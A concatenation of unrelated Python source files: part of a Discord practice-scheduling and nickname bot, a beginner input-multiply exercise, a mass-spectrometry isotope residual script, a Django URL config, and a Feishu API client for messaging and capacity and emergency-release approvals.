                        if a == 6:
                            await client.send_message(channel2, msg3)
                    if times == '18:30':
                        if a == 5:
                            quadice = 1
                    if times == '19:00':
                        if 2 <= a <= 4:
                            quadice = 1
                        elif a == 5:
                            await client.send_message(channel2, msg3)
                        elif a == 6:
                            pbpractice = 1
                    if times == '19:30':
                        if 2 <= a <= 4:
                            await client.send_message(channel2, msg3)
                        elif a == 6:
                            await client.send_message(channel2, msg3)
                    await asyncio.sleep(1)
                    if quadice == 1:
                        # NOTE(review): placeholder - quadice reminders are
                        # not implemented yet, and the flag is never reset.
                        print('test')
                    if pbpractice == 1:
                        # Generate a fresh pass and announce the PB practice.
                        randompass()
                        # NOTE(review): .format(message) is a no-op here
                        # (the string has no placeholders).
                        msg2 = ('Hello <@&457299107371941888>! Practice starts in 30 minutes and will be a Private Battle. The pass will be: ' + sn1 + sn2 + sn3 + sn4).format(message)
                        await client.send_message(channel2, msg2)
                        pbpractice = 0
                        stop = 1
                elif stop == 1:
                    # After an announcement, idle in 60 s steps.
                    await asyncio.sleep(60)
        else:
            await message.channel.send('Bot already started!')
    # !pb: force a Private Battle announcement on the next scheduler tick.
    if message.content.startswith('!pb'):
        pbpractice = 1
    # !pbstart: ping the practice channel immediately.
    if message.content.startswith('!pbstart'):
        await client.send_message(channel2, msg3)
    # !captain / !omega / !infinite / !alpha: swap the rank symbol in the
    # author's "pZ<symbol>" nickname prefix (the prefixes below are
    # mojibake-encoded symbol characters and are kept verbatim).
    if message.content.startswith('!captain'):
        curname = str(message.author.display_name)
        begin = 'pZ'
        capchara = "\u25C6"  # black diamond = captain
        supbegin = begin + capchara
        if curname.startswith("pZโณ"):
            newnick = curname.replace("pZโณ", supbegin)
            await client.send_message(message.channel, "Name changed.")
        elif curname.startswith("pZโฒ"):
            newnick = curname.replace("pZโฒ", supbegin)
            await client.send_message(message.channel, "Name changed.")
        elif curname.startswith("pZโด"):
            newnick = curname.replace("pZโด", supbegin)
            await client.send_message(message.channel, "Name changed.")
        elif curname.startswith("pZโ"):
            newnick = curname
            await client.send_message(message.channel, "You're already a captain!")
        else:
            # No recognized prefix: prepend one.
            newnick = begin + capchara + curname
            await client.send_message(message.channel, "Name changed.")
        await client.change_nickname(message.author, newnick)
    if message.content.startswith('!omega'):
        curname = str(message.author.display_name)
        begin = 'pZ'
        omechara = "\u25B3"  # white triangle = Omega
        supbegin = begin + omechara
        if curname.startswith("pZโณ"):
            newnick = curname
            await client.send_message(message.channel, "You're already in Omega!")
        elif curname.startswith("pZโฒ"):
            newnick = curname.replace("pZโฒ", supbegin)
            await client.send_message(message.channel, "Name changed.")
        elif curname.startswith("pZโด"):
            newnick = curname.replace("pZโด", supbegin)
            await client.send_message(message.channel, "Name changed.")
        elif curname.startswith("pZโ"):
            newnick = curname.replace("pZโ", supbegin)
            await client.send_message(message.channel, "Name changed.")
        else:
            newnick = begin + omechara + curname
            await client.send_message(message.channel, "Name changed.")
        await client.change_nickname(message.author, newnick)
    if message.content.startswith('!infinite'):
        curname = str(message.author.display_name)
        begin = 'pZ'
        infchara = "\u25B2"  # black triangle = Infinite
        supbegin = begin + infchara
        if curname.startswith("pZโณ"):
            newnick = curname.replace("pZโณ", supbegin)
            await client.send_message(message.channel, "Name changed.")
        elif curname.startswith("pZโฒ"):
            newnick = curname
            await client.send_message(message.channel, "You're already in Infinite!")
        elif curname.startswith("pZโด"):
            newnick = curname.replace("pZโด", supbegin)
            await client.send_message(message.channel, "Name changed.")
        elif curname.startswith("pZโ"):
            newnick = curname.replace("pZโ", supbegin)
            await client.send_message(message.channel, "Name changed.")
        else:
            newnick = begin + infchara + curname
            await client.send_message(message.channel, "Name changed.")
        await client.change_nickname(message.author, newnick)
    if message.content.startswith('!alpha'):
        curname = str(message.author.display_name)
        begin = 'pZ'
        alpchara = "\u2234"  # therefore sign = Alpha
        supbegin = begin + alpchara
        if curname.startswith("pZโณ"):
            newnick = curname.replace("pZโณ", supbegin)
            await client.send_message(message.channel, "Name changed.")
        elif curname.startswith("pZโฒ"):
            newnick = curname.replace("pZโฒ", supbegin)
            await client.send_message(message.channel, "Name changed.")
        elif curname.startswith("pZโด"):
            newnick = curname
            await client.send_message(message.channel, "You're already in Alpha!")
        elif curname.startswith("pZโ"):
            newnick = curname.replace("pZโ", supbegin)
            await client.send_message(message.channel, "Name changed.")
        else:
            newnick = begin + alpchara + curname
            await client.send_message(message.channel, "Name changed.")
        await client.change_nickname(message.author, newnick)
    # !hello / !test: simple liveness replies.
    if message.content.startswith('!hello'):
        msg = 'Hello {0.author.mention}'.format(message)
        await client.send_message(message.channel, msg)
    if message.content.startswith('!test'):
        await client.send_message(message.channel, "Hi!")
    # Disabled experiment: self-reaction handling.
    #if message.content.startswith('Hi!'):
    #author = str(message.author)
    #if author == 'PriZmBot#7447':
    #idz = message.id
    #wave = "๐"
    #await client.add_reaction(message, wave)
    #res = await client.wait_for_reaction(['๐'])
    #thing = str(reaction.user)
    #if thing == 'PriZmBot#7447':
    #print('hi')
    #else:
    #await client.send_message(message.channel, '{0.user} reacted with {0.reaction.emoji}!'.format(res))
@client.event
async def on_ready():
    # Log the bot's identity once the gateway connection is established.
    print('Logged in as')
    print(client.user.name)
    print(client.user.id)
    print('------')
# Start the bot; blocks until the client disconnects.
client.run(TOKEN)
|
#Remember to comment code
#This program will take 2 integers and multiply them

#Input
#The input function returns the string that the user enters
#All inputs start as strings
#To change the type, you "cast" it
#Casting is the process of changing type
name = input("Please input your name: ")
a = input("Please input first number: ")
a = int(a) #Self-referencing assignment: replace the string with its int value
b = input("Please input second number: ")
b = int(b)

#Process
product = a * b

#Output
print("Hi " + name + "!")
print("The product of "+str(a)+" and "+str(b)+" is "+str(product)+".")
#!/usr/bin/env python
import sys
from math import fabs

# Scan a diffmass.txt-style file for one protein/peptide pair and report
# the residual mass errors after removing whole C13 isotope offsets.
# Usage: script.py <diffmass file> <protein> <peptide> [reference dm]
#grab protein and peptide info from diffmass.txt
fn = sys.argv[1]
pro = sys.argv[2]
pep = sys.argv[3]
ref = 0.0
if len(sys.argv)>4:
    ref = float(sys.argv[4])

dC = 1.0033548  # presumably the C13-C12 mass difference in Da - TODO confirm
tol = 0.1 #Da
dd_lst = []   # residuals dm - n*dC that fall within tolerance
n_count = {}  # observation count per number of C13 offsets n = 0..3
for i in xrange(4):
    n_count[i] = 0

lines = open( fn, 'r' ).readlines()
for l in lines:
    es = l.strip().split()
    # Protein matches by substring, peptide must match exactly.
    if pro in es[0] and pep == es[1]:
        dm = float(es[2])
        n = round( dm / dC )   # nearest whole number of C13 offsets
        dd = dm - n*dC         # residual mass error
        if fabs(dd)<tol:
            dd_lst.append(dd)
            n_count[int(n)] += 1

import numpy as np
#print n_count
print "# dm=", ref, np.median(dd_lst), "std:", np.std(dd_lst)
for i in xrange(4):
    if n_count[i]>0:
        print "# +"+str(i), n_count[i]
# A reference below -999 acts as a sentinel to dump all residuals.
if ref<-999:
    for dd in dd_lst:
        print dd
|
# URL routes for this app (file added per project as needed).
from django.urls import path
from . import views

app_name = 'myapp'

urlpatterns = [
    path('', views.Home.as_view(), name='home'),
    path('store_setting/', views.store_setting, name='store_setting'),
    path('store_show_menu/', views.store_show_menu, name='store_show_menu'),
    path('store_mypage/', views.store_mypage, name='store_mypage'),
    path('store_mypage/edit/', views.store_mypage_edit, name='store_mypage_edit'),
    path('debug_websocket/', views.debug_websocket, name='debug_websocket'), #debug
    path('debug_websocket/<slug:room_name>/', views.debug_websocket_room, name='debug_websocket_room'), #debug
]
import time
from datetime import datetime
import requests
import json
from flask import current_app
from app import logger
from app.exceptions.exceptions import FeishuException
# Human-readable labels for Feishu approval states, used in error messages.
# (Values are mojibake-encoded Chinese; kept verbatim as runtime strings.)
OPER_DICT = {
    'PENDING': 'ๅฎกๆนไธญ',
    'APPROVED': '้่ฟ',
    'REJECTED': 'ๆ็ป',
    'CANCELED': 'ๆคๅ',
    'DELETED': 'ๅ ้ค'
}
class FeiShu:
    """Thin client for the Feishu (Lark) open API.

    Wraps authentication, message sending, user/department lookup and the
    approval endpoints.  All failures are normalized to FeishuException.
    Original docstrings were mojibake-encoded Chinese; translated to
    English here.  Runtime strings are kept verbatim.
    """

    def __init__(self):
        self.__app_id = current_app.config["FEISHU_APP_ID"]
        self.__app_secret = current_app.config["FEISHU_APP_SECRET"]
        self.__opes_url = current_app.config["FEISHU_OPEN_URL"]
        self.__host_url = current_app.config["FEISHU_HOST_URL"]
        self.headers = self.__init_header()

    def _get_tenant_access_token(self):
        """Fetch an app access token from the auth endpoint."""
        try:
            response = requests.post(self.__opes_url + '/open-apis/auth/v3/app_access_token/internal/',
                                     data={'app_id': self.__app_id, 'app_secret': self.__app_secret})
            app_access_token = json.loads(response.text)['app_access_token']
            return app_access_token
        except Exception as e:
            logger.error("Feishu get tenant_access_token fail!")
            raise FeishuException(e)

    def __init_header(self):
        """Build the default JSON + bearer-token request headers."""
        app_access_token = self._get_tenant_access_token()
        headers = {
            'content-type': 'application/json',
            'Authorization': 'Bearer ' + app_access_token
        }
        return headers

    def _post(self, url, data):
        """Low-level POST wrapper: up to 3 attempts, 5 s timeout, logged."""
        data_to_send = json.dumps(data).encode("utf-8")
        try:
            response = None
            for x in range(3):
                try:
                    response = requests.post(url, data=data_to_send, headers=self.headers, timeout=5)
                except Exception as e:
                    time.sleep(1)
                    if x == 2:
                        # Third failure in a row: give up.
                        raise e
                else:
                    break
            logger.info('Feishu post response. url={},data={},response={}'.format(url, data, response.text))
            return json.loads(response.text)
        except requests.exceptions.Timeout:
            logger.error("Feishu post timeout! url={0} data={1}".format(url, data))
            raise FeishuException('้ฃไนฆๆฅๅฃpost่ฏทๆฑ่ถๆถ๏ผ่ฏท้่ฏ')
        except Exception as e:
            logger.error("Feishu post msg fail! url={0} data={1} error by {2}".format(url, data, e))
            raise FeishuException(e)

    def _get(self, url, data=None):
        """Low-level GET wrapper: up to 3 attempts, 5 s timeout, logged."""
        try:
            response = None
            for x in range(3):
                try:
                    response = requests.get(url, params=data, headers=self.headers, timeout=5)
                except Exception as e:
                    time.sleep(1)
                    if x == 2:
                        raise e
                else:
                    break
            logger.info('Feishu get response. url={},data={},response={}'.format(url, data, response.text))
            return json.loads(response.text)
        except requests.exceptions.Timeout:
            logger.error("Feishu get timeout! url={0} data={1}".format(url, data))
            raise FeishuException('้ฃไนฆๆฅๅฃget่ฏทๆฑ่ถๆถ๏ผ่ฏท้่ฏ')
        except Exception as e:
            logger.error("Feishu get msg fail! url={0} data={1} error by {2}".format(url, data, e))
            raise FeishuException(e)

    def _send_msg(self, data):
        """Internal helper: POST to the single-message send endpoint."""
        result = self._post(self.__opes_url + '/open-apis/message/v4/send/', data=data)
        return result

    def send_user_msg(self, user_code, content, type='text'):
        """Send a message to one user, addressed by company email.

        :param user_code: company id; the Feishu account must be bound to
            the ``<user_code>@company.com`` mailbox.
        :param content: message body (str for text, dict for a card).
        :param type: 'text' for plain text
            (https://open.feishu.cn/document/ukTMukTMukTM/uUjNz4SN2MjL1YzM),
            'card' for interactive card messages
            (https://open.feishu.cn/document/ukTMukTMukTM/uYTNwUjL2UDM14iN1ATN).
        :raises FeishuException: if the API reports a non-zero code.
        """
        try:
            result = {'code': -1}
            if type == 'text':
                result = self._send_msg(data={
                    'email': user_code + "@company.com",
                    'msg_type': 'text',
                    "content": {
                        "text": content
                    }
                })
            elif type == 'card':
                result = self._send_msg(data={
                    'email': user_code + "@company.com",
                    'msg_type': 'interactive',
                    'card': content
                })
            if result['code'] != 0:
                logger.error("Send user msg fail! result={0}".format(result))
                raise FeishuException(result)
        except Exception as e:
            raise FeishuException(e)

    def send_user_msg_many(self, open_ids, content, type='text'):
        """Send one message to many users, in chunks.

        The batch endpoint only accepts ~200 recipients per call, so the
        id list is sent in slices of 199.

        :param open_ids: list of Feishu open_ids.
        :param content: message body (str for text, dict for a card).
        :param type: 'text' or 'card' (same docs as send_user_msg).
        :raises FeishuException: if any chunk reports a non-zero code.
        """
        try:
            for i in range(0, len(open_ids), 199):
                result = {'code': -1}
                if type == 'text':
                    result = self._post(self.__opes_url + '/open-apis/message/v4/batch_send/', data={
                        'open_ids': open_ids[i:i + 199],
                        'msg_type': 'text',
                        "content": {
                            "text": content
                        }
                    })
                elif type == 'card':
                    result = self._post(self.__opes_url + '/open-apis/message/v4/batch_send/', data={
                        'open_ids': open_ids[i:i + 199],
                        'msg_type': 'interactive',
                        'card': content
                    })
                if result['code'] != 0:
                    logger.error("Send user msg many fail! result={0}".format(result))
                    raise FeishuException(
                        'ๅ้ๆๅ{}ๆก๏ผๅ้ๅคฑ่ดฅ{}ๆก๏ผ้่ฏฏไฟกๆฏ๏ผ{}'.format(i + 199, len(open_ids) - i - 199, str(result)))
        except Exception as e:
            raise FeishuException(e)

    def get_user_id_info(self, user_code, email_type='@company.com'):
        """Look up a user's Feishu ids by email
        (https://open.feishu.cn/document/ukTMukTMukTM/uUzMyUjL1MjM14SNzITN).

        :param user_code: company id (the local part of the email).
        :param email_type: mail domain suffix, for accounts not bound to
            the default company.com domain.
        :return: dict like ``{"open_id": "ou_...", "user_id": "a7eb3abe"}``.
        :raises FeishuException: if the account has no bound mailbox.
        """
        try:
            email_code = user_code + email_type
            result = self._get(self.__opes_url + '/open-apis/user/v1/batch_get_id', {'emails': email_code})
            if 'email_users' in result['data'].keys():
                user_info = result['data']['email_users'][email_code][0]
                return user_info
            else:
                raise FeishuException('้ฃไนฆ่ดฆๅทๆชไธ้ฎ็ฎฑ็ปๅฎ๏ผ่ฏท่็ณป้ฃไนฆ็ฎก็ๅ็ปๅฎ้ฎ็ฎฑ')
        except Exception as ex:
            logger.error("Feishu get user id info fail! user_code={0} error by {1}".format(user_code, ex))
            raise FeishuException(ex)

    def get_user_info(self, user_open_id):
        """Fetch a user's profile; only addressable by open_id
        (https://open.feishu.cn/document/ukTMukTMukTM/uIzNz4iM3MjLyczM).

        :param user_open_id: the user's Feishu open_id; obtainable via
            self.get_user_id_info.
        :return: the first entry of ``user_infos`` (name, name_py, en_name,
            employee_id, employee_no, open_id, union_id, ...).
        :raises FeishuException: on a non-zero API code.
        """
        try:
            user_info = self._get(self.__opes_url + '/open-apis/contact/v1/user/batch_get', {'open_ids': user_open_id})
            if user_info['code'] == 0:
                return user_info['data']['user_infos'][0]
            else:
                raise FeishuException('่ทๅ่ฏฅ็จๆท้ฃไนฆไธชไบบไฟกๆฏๅคฑ่ดฅ,่ฏท่็ณป็ฎก็ๅๅค็')
        except Exception as ex:
            logger.error("Feishu get user info fail! user_open_id={0} error by {1}".format(user_open_id, ex))
            raise FeishuException(ex)

    def get_department_info(self, open_department_id):
        """Fetch department details by open_department_id."""
        try:
            department = self._get(self.__opes_url + '/open-apis/contact/v1/department/info/get',
                                   {'open_department_id': open_department_id})
            return department
        except Exception as ex:
            logger.error(
                "Feishu get department info fail! open_department_id={0} error by {1}".format(open_department_id, ex))
            raise FeishuException(ex)

    def approval_create(self, approval_code, apply_user_id, data, approval_user_id=None, approval_node_id=None):
        """Create an approval instance.

        :param approval_code: unique id of the approval flow definition.
        :param apply_user_id: applicant's user_id.
        :param data: form payload; JSON-encoded before sending.
        :param approval_user_id: approver; leader approves by default when omitted.
        :param approval_node_id: approval node id; leader node by default.
        :return: the API ``data`` payload of the created instance.
        :raises FeishuException: on a non-zero API code.
        """
        try:
            print(data)  # NOTE(review): debug print left in the production path
            approval_data = {
                "approval_code": approval_code,
                "user_id": apply_user_id,
                "form": json.dumps(data),
            }
            if approval_user_id:
                # Pin the approver on both the explicit node and the manager node.
                approval_data['node_approver_user_id_list'] = {
                    approval_node_id: [approval_user_id],
                    "manager_node_id": [approval_user_id]
                }
            print(approval_data)  # NOTE(review): debug print
            result = self._post(self.__host_url + '/approval/openapi/v2/instance/create', approval_data)
            if result['code'] != 0:
                raise FeishuException('้ฃไนฆๅๅปบๅฎกๆนๅคฑ่ดฅ,้่ฏฏไฟกๆฏ๏ผ{}๏ผ่ฏท่็ณป็ฎก็ๅๅค็'.format(result['msg']))
            else:
                return result['data']
        except Exception as ex:
            logger.error(
                "Feishu approval create fail! approval_code={0},apply_user_id={1},data={2},approval_user_id={3} error by {4}"
                .format(approval_code, apply_user_id, data, approval_user_id, ex))
            raise FeishuException(ex)

    def approval_revoke(self, approval_code, instance_code, apply_user_id):
        """Cancel an approval instance.

        :param approval_code: approval flow definition id.
        :param instance_code: approval instance id.
        :param apply_user_id: applicant's user_id.
        :return: 'repeat' if the instance was already canceled, else 'success'.
        :raises FeishuException: if the cancel fails for any other reason.
        """
        try:
            result = self._post(self.__host_url + '/approval/openapi/v2/instance/cancel', {
                'approval_code': approval_code,
                'instance_code': instance_code,
                'user_id': apply_user_id
            })
            if result['code'] != 0:
                # A failed cancel may just mean it is already canceled.
                if self.__check_approval_status(result, instance_code, 'CANCELED'):
                    return 'repeat'
                else:
                    raise FeishuException('้ฃไนฆๆคๅๅฎกๆนๅคฑ่ดฅ,้่ฏฏไฟกๆฏ๏ผ{}๏ผ่ฏท่็ณป็ฎก็ๅๅค็'.format(result['msg']))
            else:
                return 'success'
        except Exception as ex:
            logger.error("Feishu approval revoke fail! instance_code={0},error by {1}"
                         .format(instance_code, ex))
            raise FeishuException(ex)

    def get_approval_info(self, instance_code):
        """Fetch the detail of an approval instance.

        :param instance_code: approval instance id.
        :return: the API ``data`` payload (status, task_list, timeline, ...).
        :raises FeishuException: on a non-zero API code.
        """
        try:
            result = self._post(self.__host_url + '/approval/openapi/v2/instance/get', {
                'instance_code': instance_code
            })
            if result['code'] == 0:
                return result['data']
            else:
                raise FeishuException('้ฃไนฆ่ทๅๅฎกๆนๅฎไพ่ฏฆๆๅคฑ่ดฅ๏ผ้่ฏฏไฟกๆฏๆฏ:{0},่ฏท่็ณป็ฎก็ๅๅค็'.format(result['msg']))
        except Exception as ex:
            logger.error("Feishu approval revoke fail! instance_code={0},error by {1}"
                         .format(instance_code, ex))
            raise FeishuException(ex)

    def __check_approval_status(self, result, instance_code, oper):
        """Check whether an error really means "already in state *oper*".

        Feishu returns code 65001 (internal error) when the instance state
        conflicts with the requested operation, so on 65001 the instance is
        re-read and its status compared with the intended operation.

        :param result: the raw failing API response.
        :param instance_code: approval instance id.
        :param oper: the attempted operation (a key of OPER_DICT).
        :return: True if the instance is already in the desired state,
            False otherwise; implicitly None when result['code'] != 65001.
        :raises FeishuException: when the instance is in a different
            terminal state (approved/rejected/canceled/deleted).
        """
        if result['code'] == 65001:
            try:
                approval_info = self.get_approval_info(instance_code)
                if approval_info['status'] == oper:
                    return True
                elif approval_info['status'] == 'APPROVED':
                    raise FeishuException('้ฃไนฆๅฎกๆนๅทฒ็ป้่ฟ,ๆ ๆณ่ฟ่กๅฎกๆน{}'.format(OPER_DICT[oper]))
                elif approval_info['status'] == 'REJECTED':
                    raise FeishuException('้ฃไนฆๅฎกๆนๅทฒ็ปๆ็ป,ๆ ๆณ่ฟ่กๅฎกๆน{}'.format(OPER_DICT[oper]))
                elif approval_info['status'] == 'CANCELED':
                    raise FeishuException('้ฃไนฆๅฎกๆนๅทฒ็ปๆคๅ,ๆ ๆณ่ฟ่กๅฎกๆน{}'.format(OPER_DICT[oper]))
                elif approval_info['status'] == 'DELETED':
                    raise FeishuException('้ฃไนฆๅฎกๆนๅทฒ็ปๅ ้ค,ๆ ๆณ่ฟ่กๅฎกๆน{}'.format(OPER_DICT[oper]))
                else:
                    return False
            except Exception as ex:
                logger.error("Feishu check status approval fail! result={0},instance_code={1},oper{2},error by {3}"
                             .format(result, instance_code, oper, ex))
                raise FeishuException(ex)
class FeishuApproval(FeiShu):
    """Common Feishu approval helpers: revoke and comment extraction.

    Interface-style base class; not meant to be used standalone.
    (Original docstrings were mojibake-encoded Chinese; translated here.)
    """

    def revoke_apply(self, instance_code=None, approval_code=None, companyid=None):
        """Revoke an approval on behalf of *companyid*.

        :param instance_code: approval instance id.
        :param approval_code: approval flow definition id.
        :param companyid: applicant's company id, resolved to user_id first.
        :return: 'success' or 'repeat' (see approval_revoke).
        """
        user_id_info = self.get_user_id_info(companyid)
        feishu_result = self.approval_revoke(
            approval_code,
            instance_code,
            user_id_info['user_id']
        )
        return feishu_result

    def get_approval_content(self, instance_code):
        """Return the first comment found in the instance timeline, or ''.

        :param instance_code: approval instance id.
        """
        approval_info = self.get_approval_info(instance_code)
        for obj in approval_info['timeline']:
            if 'comment' in obj.keys():
                return obj['comment']
        return ''

    def get_leader_comment(self, approval_info=None):
        """Return the leader-approval node's comment, or ''.

        :param approval_info: pre-fetched instance detail dict
            (see get_approval_info).
        """
        # if approval_info:
        #     approval_info = self.get_approval_info(instance_code)
        task_id = ''
        # Find the finished leader-approval task...
        for obj in approval_info['task_list']:
            if obj['node_name'] == '้ขๅฏผๅฎกๆน' and obj['status'] in ['APPROVED', 'REJECTED']:
                task_id = obj['id']
                break
        # ...then pull its comment from the timeline.
        for obj in approval_info['timeline']:
            if 'task_id' in obj.keys() and obj['task_id'] == task_id:
                if 'comment' in obj.keys():
                    return obj['comment']
        return ''

    def get_ops_comment(self, instance_code=None, approval_info=None):
        """Return the ops-approval node's comment, or ''.

        :param instance_code: approval instance id; when given, the detail
            is fetched, otherwise *approval_info* is used as-is.
        :param approval_info: pre-fetched instance detail dict.
        """
        if instance_code:
            approval_info = self.get_approval_info(instance_code)
        task_id = ''
        # Find the finished ops-approval task...
        for obj in approval_info['task_list']:
            if obj['node_name'] == '่ฟ็ปดๅฎกๆน' and obj['status'] in ['APPROVED', 'REJECTED']:
                task_id = obj['id']
                break
        # ...then pull its comment from the timeline.
        for obj in approval_info['timeline']:
            if 'task_id' in obj.keys() and obj['task_id'] == task_id:
                if 'comment' in obj.keys():
                    return obj['comment']
        return ''
class FeishuCapacityAndEmergencyApproval(FeishuApproval):
    """
    Feishu approval-flow operations for capacity scaling and emergency releases.
    """
    def create_apply(self, capacity_obj=None, emergency_obj=None, unit_capacity_objs=None,
                     leader=None, user_code=None, app_approval=None, app_approval_detail=None):
        """
        Create an approval request.

        Exactly one of capacity_obj (scale up/down), emergency_obj (emergency
        release) or app_approval must be supplied; otherwise TypeError is raised.
        When *leader* is provided, the request is routed to that approver node.
        Returns the raw Feishu approval_create response.
        """
        # Approval definition codes/node ids live in the Flask app config.
        FS_PLUS_CAPACITY_APPROVAL_CODE = current_app.config["FS_PLUS_CAPACITY_APPROVAL_CODE"]
        FS_REDUCE_CAPACITY_APPROVAL_CODE = current_app.config["FS_REDUCE_CAPACITY_APPROVAL_CODE"]
        FS_EMERGENCY_RELEASE_APPROVAL_CODE = current_app.config["FS_EMERGENCY_RELEASE_APPROVAL_CODE"]
        user_id_info = self.get_user_id_info(user_code)
        value = ""
        if capacity_obj:
            # Scale-up branch (capacity_kind == 0)
            if capacity_obj.capacity_kind == 0:
                approval_code = FS_PLUS_CAPACITY_APPROVAL_CODE.get("approval_code")
                approval_node_id = FS_PLUS_CAPACITY_APPROVAL_CODE.get("approval_node_id")
                for unit_capacity in unit_capacity_objs:
                    # Delta = current - requested; falls back to 0 when either side is unset.
                    unit_capacity_blue_now = unit_capacity.now_blue_instance - unit_capacity.blue_instance if unit_capacity.now_blue_instance is not None and unit_capacity.blue_instance is not None else 0
                    unit_capacity_green_now = unit_capacity.now_green_instance - unit_capacity.green_instance if unit_capacity.now_green_instance is not None and unit_capacity.green_instance is not None else 0
                    unit_capacity_gray_now = unit_capacity.now_gray_instance - unit_capacity.gray_instance if unit_capacity.now_gray_instance is not None and unit_capacity.gray_instance is not None else 0
                    # Human-readable per-unit summary (blue/green/gray groups).
                    value += "ๅๅ
{}({}): \n่็ป็ฐๆๅฎไพๆฐ: {}๏ผๆฉๅฎนๆฐ: {};" \
                             "\n็ปฟ็ป็ฐๆๅฎไพๆฐ: {}๏ผๆฉๅฎนๆฐ: {};" \
                             "\n็ฐ็ป็ฐๆๅฎไพๆฐ: {}๏ผๆฉๅฎนๆฐ: {}\n\n".format(unit_capacity.unit, "ๆฉๅฎน",
                                                              unit_capacity.blue_instance if unit_capacity.blue_instance else 0,
                                                              unit_capacity_blue_now,
                                                              unit_capacity.green_instance if unit_capacity.green_instance else 0,
                                                              unit_capacity_green_now,
                                                              unit_capacity.gray_instance if unit_capacity.gray_instance else 0,
                                                              unit_capacity_gray_now)
                if capacity_obj.app_type == 0:
                    deploy_type = FS_PLUS_CAPACITY_APPROVAL_CODE.get("form_info").get("deploy_type").get('k8s')
                else:
                    deploy_type = FS_PLUS_CAPACITY_APPROVAL_CODE.get("form_info").get("deploy_type").get('dvd')
            # Scale-down branch
            else:
                approval_code = FS_REDUCE_CAPACITY_APPROVAL_CODE.get("approval_code")
                approval_node_id = FS_REDUCE_CAPACITY_APPROVAL_CODE.get("approval_node_id")
                for unit_capacity in unit_capacity_objs:
                    # Delta direction is reversed for scale-down: requested - current.
                    unit_capacity_blue_now = unit_capacity.blue_instance - unit_capacity.now_blue_instance if unit_capacity.now_blue_instance is not None and unit_capacity.blue_instance is not None else 0
                    unit_capacity_green_now = unit_capacity.green_instance - unit_capacity.now_green_instance if unit_capacity.now_green_instance is not None and unit_capacity.green_instance is not None else 0
                    unit_capacity_gray_now = unit_capacity.gray_instance - unit_capacity.now_gray_instance if unit_capacity.now_gray_instance is not None and unit_capacity.gray_instance is not None else 0
                    value += "ๅๅ
{}({}): \n่็ป็ฐๆๅฎไพๆฐ: {}๏ผ็ผฉๅฎนๆฐ: {};" \
                             "\n็ปฟ็ป็ฐๆๅฎไพๆฐ: {}๏ผ็ผฉๅฎนๆฐ: {};" \
                             "\n็ฐ็ป็ฐๆๅฎไพๆฐ: {}๏ผ็ผฉๅฎนๆฐ: {}\n\n".format(unit_capacity.unit, "็ผฉๅฎน",
                                                              unit_capacity.blue_instance if unit_capacity.blue_instance else 0,
                                                              # unit_capacity.blue_instance - unit_capacity.now_blue_instance,
                                                              unit_capacity_blue_now,
                                                              unit_capacity.green_instance if unit_capacity.green_instance else 0,
                                                              # unit_capacity.green_instance - unit_capacity.now_green_instance,
                                                              unit_capacity_green_now,
                                                              unit_capacity.gray_instance if unit_capacity.gray_instance else 0,
                                                              # unit_capacity.gray_instance - unit_capacity.now_gray_instance
                                                              unit_capacity_gray_now
                                                              )
                if capacity_obj.app_type == 0:
                    deploy_type = FS_REDUCE_CAPACITY_APPROVAL_CODE.get("form_info").get("deploy_type").get('k8s')
                else:
                    deploy_type = FS_REDUCE_CAPACITY_APPROVAL_CODE.get("form_info").get("deploy_type").get('dvd')
            # Build the Feishu approval form payload
            form_data = [{"id": "module_code", "type": "input", "value": capacity_obj.app_name},
                         {"id": "capacity_text", "type": "textarea", "value": value},
                         {"id": "deploy_type", "type": "radioV2", "value": deploy_type},
                         {"id": "apply_reason", "type": "textarea", "value": capacity_obj.apply_reason}]
        elif emergency_obj:
            approval_code = FS_EMERGENCY_RELEASE_APPROVAL_CODE.get("approval_code")
            approval_node_id = FS_EMERGENCY_RELEASE_APPROVAL_CODE.get("approval_node_id")
            leader_approval = FS_EMERGENCY_RELEASE_APPROVAL_CODE.get("form_info").get("approval_type").get(
                'leader_approval')
            custome_approval = FS_EMERGENCY_RELEASE_APPROVAL_CODE.get("form_info").get("approval_type").get(
                'custome_approval')
            if emergency_obj.app_type == 0:
                deploy_type = FS_EMERGENCY_RELEASE_APPROVAL_CODE.get("form_info").get("deploy_type").get('k8s')
            else:
                deploy_type = FS_EMERGENCY_RELEASE_APPROVAL_CODE.get("form_info").get("deploy_type").get('dvd')
            # NOTE(review): when an explicit leader is passed the *custom*
            # approval type is chosen (and vice versa) — looks inverted at
            # first glance; confirm this mapping against the Feishu form.
            if leader:
                approval_type = custome_approval
            else:
                approval_type = leader_approval
            form_data = [{"id": "module_code", "type": "input", "value": emergency_obj.app_name},
                         {"id": "deploy_type", "type": "radioV2", "value": deploy_type},
                         {"id": "approval_type", "type": "radioV2", "value": approval_type},
                         {"id": "timerange", "type": "dateInterval", "value": {
                             "start": datetime.strftime(emergency_obj.cd_start_time, "%Y-%m-%dT%H:%M:%S+08:00"),
                             "end": datetime.strftime(emergency_obj.cd_end_time, "%Y-%m-%dT%H:%M:%S+08:00"),
                             "interval": 4.0}},
                         {"id": "apply_reason", "type": "textarea", "value": emergency_obj.apply_reason}]
        elif app_approval:
            approval_node_id = None
            approval_code = current_app.config["FS_APP_DETAIL_APPROVAL_CODE"].get("approval_code")
            form_data = self.handle_app_approval(app_approval_detail)
        else:
            raise TypeError("ๅฟ
้กปๆปก่ถณๆฉ็ผฉๅฎน/็ดงๆฅๅๅธไปปๆไธ็งๆจกๅผ")
        # Route to a specific approver node when a leader was supplied.
        if leader:
            feishu_result = self.approval_create(approval_code,
                                                 user_id_info['user_id'],
                                                 form_data,
                                                 approval_user_id=leader,
                                                 approval_node_id=approval_node_id)
        else:
            feishu_result = self.approval_create(approval_code,
                                                 user_id_info['user_id'],
                                                 form_data)
        return feishu_result
    def handle_app_approval(self, data):
        """Build the Feishu form payload for an app-detail approval.

        Summarizes requested vs. previous per-zone deployment counts
        (blue/green/gray) into two textareas.
        """
        value = ""
        old_value = ""
        for _data in data.get("deploymentConfig"):
            value += f"ๅๅ
{_data.get('zone')}่็ปไธชๆฐ{_data.get('blue')}, ็ปฟ็ปไธชๆฐ{_data.get('green')}, ็ฐ็ปไธชๆฐ{_data.get('gray')}\n"
        for _old_data in data.get("old_deployment"):
            # old_deployment is a mapping keyed by zone name.
            old_data = data['old_deployment'][_old_data]
            old_value += f"ๅๅ
{_old_data}่็ปไธชๆฐ{old_data.get('blue')}, ็ปฟ็ปไธชๆฐ{old_data.get('green')}, ็ฐ็ปไธชๆฐ{old_data.get('gray')}\n"
        form_data = [{"id": "version_type", "type": "input", "value": data.get("versionType")},
